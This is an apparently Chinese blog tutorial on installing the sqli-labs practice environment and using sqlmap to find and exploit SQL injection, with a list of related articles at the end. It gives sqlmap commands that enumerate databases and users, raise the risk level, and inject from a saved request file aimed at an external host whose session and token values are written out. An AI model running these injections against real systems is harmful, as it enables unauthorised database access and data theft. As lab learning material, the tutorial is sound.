SQL注入：

sqli-labs:

一个实验平台，里面有完整的SQL注入课程，需要phpstudy环境，因此先安装phpstudy环境

phpstudy:

https://www.xp.cn/

安装后发现数据库和我本机的数据库出现冲突了，只能使用

sc delete mysql

删掉我本机的mysql8服务，如果需要使用原来的mysql，管理员命令下输入

mysqld --install

删除之后成功启动

启动成功后，去下载sqli-labs:

 https://github.com/Audi-1/sqli-labs

下载后的包导入到php的根目录WWW下，然后将D:\softwares\phpstudy_pro\WWW\sqli\sql-connections目录下的db-creds.inc文件里面的用户名和密码都设置为root

启动成功后访问

http://127.0.0.1/sqli/

然后点击reset Database for labs重置数据库

如果重置数据库出现mysql_connect(): The mysql extension is deprecated and will be removed in the future

进入phpstudy,选择php5.5.9版本即可

sqlmap：

安装sqlmap：不要后面的算法

由于手动注入、半自动化注入效率较低，对于一些常规的、重复性的可以交由神奇sqlmap来完成

sqlmap需要python2的环境，因此，在安装一个python2环境，因为我本机已经有python3环境了，所以安装python2需要注意一点：

先下载Python2：www.python.org

下载后安装就OK了，然后配置环境变量：把安装目录加上去

然后重命名python.exe改为python2.exe

打开cmd输入：Python2

表示成功

sqlmap注入sqli-lab测试：

在sqlmap目录输入：

python2 .\sqlmap.py,

出现如下信息表示启动成功，可以使用

打开sqli-lab 第一章：http://127.0.0.1/sqli/Less-1/

需要传id可以查到数据库的内容；

输入地址http://127.0.0.1/sqli/Less-1/?id=4

可以发现对应数据库数据一致，接下来我们对数据库进行SQL注入测试：

sqlmap命令行输入

python2 sqlmap.py -u "http://127.0.0.1:8080/thymeleaf/listCategory?start=2"

出现：已经检测到是mysql数据库，是否跳过检测其他类型数据库，输入y

出现：GET 参数 ‘id’ 易受攻击，我们选择Y,sqlmap就已经判断该链接的数据库以及其他服务版本是具有SQL注入威胁存在的

常用的命令：

例如：输入

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --dbs直接列出了我的所有数据库

例如输入

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --current-user直接列出了当前的用户

也可以通过文件进行注入

文件为payload.txt内容为接口信息

POST /biz/modularity/project114/manyParamsSqlszsfdsfwe HTTP/1.1
Host: http://daily.manateeai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://daily.manateeai.com
Content-Type: application/json
Origin: http://daily.manateeai.com
Connection: keep-alive
session:dd9cee1fdec64bfba5843c6f1093ae3a
token:a6884edadb24c247c3c632b521f91f77{"name": "张三","pageNum": 2,"pageSize": 2
}

输入命令

python2 sqlmap.py -r payload.txt --batch --dbs 直接列出了当前的数据库信息列表

风险等级评测：

探测等级（执行测试的等级（1-5，默认为1） )
参数: --level
共有五个等级,默认为1 ,lv2：cookie; lv3：user-agent，refere; lv5：host 我常使用–level 3

风险等级（执行测试的风险（0-3，默认为1））
参数: -risk
共有四个风险等级,risk 2：基于事件的测试;risk 3：or语句的测试;risk 4：update的测试
升高风险等级会增加数据被篡改的风险。常用就是默认1

例如：输入：

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --level=5 --risk=3

注意点！！！：

每次注入完需要把C盘有个目录下的缓存文件夹删掉，如果不请掉的话，会拿以前的注入点去注最新的接口，有可能会造成sql注入结果无效

SQL注入（使用sqli-labs案例以及sqlmap自动化注入工具）相关推荐

SQL注入攻击及防御手动注入+sqlmap自动化注入实战（网络安全学习12）
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
SQLi LABS Less 17 报错注入
第十七关单引号字符型注入 ,推荐使用报错注入. 一.功能分析这关是一个修改密码的功能,先查询用户名是否正确. 如果用户名正确,后台就修改密码,并提示修改成功: 如果用户名错误,页面就直接返回修改失败 ...
SQLi LABS Less 14 报错注入+布尔盲注
第十四关双引号字符串型注入 , 推荐使用报错注入.布尔盲注. 目录一.功能分析二.思路分析三.解题步骤方式一:报错注入第一步.判断注入点第二步.判断报错条件第三步.脱库方式二:布尔盲注 ...
【SQL注入-15】自动化注入案例—以sqli-labs-less9为例（利用sqlmap工具）
目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
SQL注入基础原理与案例（详细总结）
SQL注入基础原理与案例一.前言二.漏洞概述及危害 1.漏洞概述 2.漏洞危害 3.漏洞防范三.SQL注入 1.SQL注入方式 (1)信息收集 (2)数据注入 (3)高权限注入 2.判断是否存在 ...

SQL注入（使用sqli-labs案例以及sqlmap自动化注入工具）